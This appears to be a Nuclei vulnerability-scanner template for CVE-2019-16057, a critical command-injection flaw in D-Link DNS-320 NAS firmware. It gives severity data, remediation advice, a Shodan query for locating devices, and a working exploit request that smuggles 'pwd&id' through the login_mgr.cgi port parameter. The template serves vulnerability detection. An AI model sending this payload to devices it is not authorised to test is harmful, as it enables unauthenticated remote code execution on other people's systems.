id: CVE-2019-16057 info: name: D-Link DNS-320 - Remote Code Execution author: DhiyaneshDk severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png - https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-16057 cwe-id: CWE-78 epss-score: 0.97548 epss-percentile: 0.99994 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dlink product: dns-320_firmware shodan-query: html:"ShareCenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink http: - method: GET path: - "{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=" matchers: - type: dsl dsl: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and # digest: 4b0a004830460221008224508bcb6a50664055fe87bbcb0d394a15dcc0f54f4a0260a0881922ebe465022100d1136634914ecfb74ba4e5b8b7a346b33ea052a758d816a82e0a1dd95d9146f5:922c64590222798bb761d5b6d8e72950